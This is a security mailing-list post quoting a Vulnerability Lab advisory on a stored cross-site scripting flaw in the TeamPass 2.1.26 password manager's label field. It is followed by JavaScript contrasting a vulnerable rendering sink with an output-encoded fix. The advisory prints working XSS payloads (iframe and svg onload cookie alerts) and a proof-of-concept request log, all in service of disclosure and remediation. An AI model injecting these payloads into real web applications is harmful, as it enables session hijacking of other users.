This looks very similar to the persistent XSS reported a while ago on the TeamPass GitHub; is it the same vulnerability?
https://github.com/nilsteampassnet/TeamPass/issues/1244

On 25 May 2016 at 19:10, Vulnerability Lab <[email protected]> wrote:

> Document Title:
> ===============
> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1845
>
>
> Release Date:
> =============
> 2016-05-24
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1845
>
>
> Common Vulnerability Scoring System:
> ====================================
> 3.4
>
>
> Product & Service Introduction:
> ===============================
> TeamPass is a Passwords Manager dedicated for managing passwords in a
> collaborative way on any server Apache, MySQL and PHP. It is especially
> designed to provide passwords access security for allowed people. This
> makes TeamPass really useful in a Business/Enterprise environment and will
> provide to IT or Team Manager a powerful and easy tool for customizing
> passwords access depending on the user’s role.
>
> (Copy of the Homepage: http://teampass.net/ )
>
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered an
> application-side cross site scripting vulnerability in the Teampass
> v2.1.25/26 application.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2016-05-17: Researcher Notification & Coordination (Peter Kok)
> 2016-05-18: Vendor Notification (Teampass Security Team)
> 2016-05-18: Vendor Response/Feedback (Teampass Security Team)
> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team)
> 2016-05-24: Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Affected Product(s):
> ====================
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25
>
> Nils Laumaillé
> Product: Teampass Password Manager - Online Service (Web-Application) 2.1.26
>
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Medium
>
>
> Technical Details & Description:
> ================================
> An application-side cross site scripting web vulnerability has been
> discovered in the official Teampass v2.1.26 web-application. The
> vulnerability allows remote attackers to inject their own malicious script
> code into the application-side of the vulnerable module or function.
>
> Teampass allows authenticated users to create items to store usernames,
> passwords, descriptions, files and more. When creating or editing an item,
> the very first field, the label field, is vulnerable to iframe injection
> and XSS insertion. The iframe or cross site scripting will be executed as
> soon as a user opens a folder. The attack vector is persistent and the
> request method to inject is POST.
>
> The security risk of the application-side vulnerability is estimated as
> medium with a cvss (common vulnerability scoring system) count of 3.4.
> Exploitation of the persistent web vulnerability requires a low privileged
> web-application user account and low or medium user interaction.
> Successful exploitation of the vulnerability results in session hijacking,
> persistent phishing attacks, persistent external redirects to malicious
> sources and persistent manipulation of affected or connected application
> modules.
>
> Request Method(s):
> [+] POST
>
> Vulnerable Function(s):
> [+] Add or Edit (Label)
>
> Vulnerable Parameter(s):
> [+] label name
>
> Affected Module(s):
> [+] Item Listing
>
>
> Proof of Concept (PoC):
> =======================
> The persistent cross site scripting web vulnerability can be exploited by
> remote attackers without privileged web-application user account and low
> or medium user interaction. For security demonstration or to reproduce the
> vulnerability follow the provided information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1. Create or edit an item
> 2. Change the first label name field to a script code payload
>    Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"
>    onload=alert(document.cookie)<></iframe> or
>    <svg/onload=alert(document.cookie)>
> 3. The execution occurs in the main label field output context value
> 4. Successful reproduction of the application-side vulnerability!
>
>
> --- PoC Session Logs [POST] ---
> Status: 200[OK]
> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
> Mime Type[application/json]
> Request Header:
> Host[teampass.localhost:8080]
> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0]
> Accept[application/json, text/javascript, */*; q=0.01]
> X-Requested-With[XMLHttpRequest]
> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
> Connection[keep-alive]
> POST Data:
> cproject_id[23]
> password_id[73]
> name[Dans+Linux+user+%22%3E%3C[SCRIPT CODE PAYLOAD INJECT VIA NAME LABEL!]%3E]
> tags[]
> hidden-tags[]
> access_info[]
> faketextdonotautofill1[]
> username[dan]
> faketextdonotautofill2[]
> email[]
> fakepwddonotautofill1[]
> password[hello]
> password_visible[hello]
> fakepwddonotautofill2[]
> repeat_password[hello]
> repeat_password_visible[hello]
> expiry_date_edit[]
> notes[]
> Response Header:
> Date[Wed, 25 May 2016 08:53:48 GMT]
> Server[Apache]
> X-Powered-By[PHP/5.4.4-14+deb7u8]
> Expires[Thu, 19 Nov 1981 08:52:00 GMT]
> Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
> Pragma[no-cache]
> Content-Length[74]
> Keep-Alive[timeout=5, max=99]
> Connection[Keep-Alive]
> Content-Type[application/json; charset=utf-8]
> -
> Status: 200[OK]
> GET http://teampass.localhost:8080/index.php/checkss/n/pwd
> Mime Type[text/html]
> Request Header:
> Host[teampass.localhost:8080]
> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0]
> Accept[text/html, */*; q=0.01]
> X-Requested-With[XMLHttpRequest]
> Referer[http://teampass.localhost:8080/index.php/pwd/view/73]
> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6]
> Connection[keep-alive]
> Response Header:
> Date[Wed, 25 May 2016 08:53:49 GMT]
> Server[Apache]
> X-Powered-By[PHP/5.4.4-14+deb7u8]
> Connection[Keep-Alive]
> Content-Type[text/html]
>
>
> Reference(s):
> http://teampass.localhost:8080/
> http://teampass.localhost:8080/index.php/
> http://teampass.localhost:8080/index.php/pwd/
> http://teampass.localhost:8080/index.php/checkss/
> http://teampass.localhost:8080/index.php/checkss/n/
> http://teampass.localhost:8080/index.php/checkss/n/pwd
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/
> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73
>
>
> Security Risk:
> ==============
> The security risk of the application-side cross site scripting
> vulnerability in the teampass application is estimated as medium. (CVSS 3.4)
>
>
> Credits & Authors:
> ==================
> Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok]
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties, either expressed or
> implied, including the warranties of merchantability and capability for a
> particular purpose. Vulnerability-Lab or its suppliers are not liable in
> any case of damage, including direct, indirect, incidental, consequential
> loss of business profits or special damages, even if Vulnerability-Lab or
> its suppliers have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation may not
> apply. We do not approve or encourage anybody to break any licenses,
> policies, deface websites, hack into databases or trade with stolen data.
>
> Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
> Contact:  [email protected] - [email protected] - [email protected]
> Section:  magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
> Social:   twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
> Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
> Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
>
> Any modified copy or reproduction, including partial usage, of this file
> requires authorization from Vulnerability Laboratory. Permission to
> electronically redistribute this alert in its unmodified form is granted.
> All other rights, including the use of other media, are reserved by
> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> advisories, source code, videos and other information on this website are
> trademarks of the vulnerability-lab team & the specific authors or
> managers. To record, list, modify, use or edit our material, contact
> (admin@ or [email protected]) to ask for permission.
>
> Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
>
>
>
> --
> VULNERABILITY LABORATORY - RESEARCH TEAM
> SERVICE: www.vulnerability-lab.com
> CONTACT: [email protected]
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

--
“If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - Edsger Dijkstra
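The label-field bug the quoted advisory describes, as an added example that is not part of the original post and is not TeamPass's code. The page does not show how TeamPass renders the item listing, so the `<li title="...">` fragment below is an assumption chosen to match the advisory's first payload, which opens with `">` to close an attribute value before injecting a tag. The block pushes the two payloads quoted in the PoC through a raw-concatenation sink and through a context-encoded one, and checks that only the former yields a foreign element while the latter still round-trips the label unchanged.

```javascript
// Added example (not TeamPass code): how a stored item label becomes XSS when
// it is concatenated into item-listing markup, and the output encoding that
// neutralises it. The <li title="..."> markup is an assumption chosen to
// mirror the advisory's `">` prefix (attribute breakout, then a new tag).

// The two payloads quoted in the advisory, as stored once the POST to
// aj_edit_save has been URL-decoded (constructed test input).
const PAYLOADS = [
  'Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/" onload=alert(document.cookie)<></iframe>',
  '<svg/onload=alert(document.cookie)>',
];

// Vulnerable sink: the label lands raw in an attribute value and in element
// text, so `"` terminates the attribute and `<` opens a new tag.
function renderItemUnsafe(item) {
  return `<li title="${item.label}" data-id="${item.id}">${item.label}</li>`;
}

// Contextual output encoding: the five characters that matter in HTML text
// and in double- or single-quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hardened sink: every untrusted field is encoded for the context it lands
// in, and the id is coerced to a number so it cannot carry markup either.
function renderItemSafe(item) {
  const label = escapeHtml(item.label);
  return `<li title="${label}" data-id="${Number(item.id)}">${label}</li>`;
}

// Heuristic used only to make the difference testable: any tag in the
// rendered fragment other than the <li> we emitted ourselves was injected.
function containsInjectedTag(html) {
  return /<(?!\/?li\b)[a-z!\/]/i.test(html);
}

// Inverse of escapeHtml, used to show the safe rendering loses no label data.
function unescapeHtml(value) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
  return String(value).replace(/&(amp|lt|gt|quot|#39);/g, (m) => map[m]);
}

// Recover the label text from a fragment produced by renderItemSafe.
function labelFromSafeHtml(html) {
  const m = /^<li [^>]*>(.*)<\/li>$/s.exec(html);
  return m ? unescapeHtml(m[1]) : null;
}

// Stand-alone demo: print both renderings for each payload.
for (const label of PAYLOADS) {
  const item = { id: 73, label };
  console.log('unsafe:', renderItemUnsafe(item));
  console.log('safe:  ', renderItemSafe(item));
}
```

Two points the example is meant to make. First, the fix belongs at the output sink, in the context where the label lands: filtering `<script>` out of the `name` parameter on the POST would not stop the `<svg/onload>` form or the attribute breakout, and it would mangle legitimate labels that happen to contain `<` or `"`. Second, because the listing is fetched as JSON over XHR (see the `application/json` response in the PoC log), the encoding has to happen in whatever client-side code inserts the value into the DOM; assigning it via `textContent` or `setAttribute` rather than building HTML strings for `innerHTML` removes the problem without any escaping table at all.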
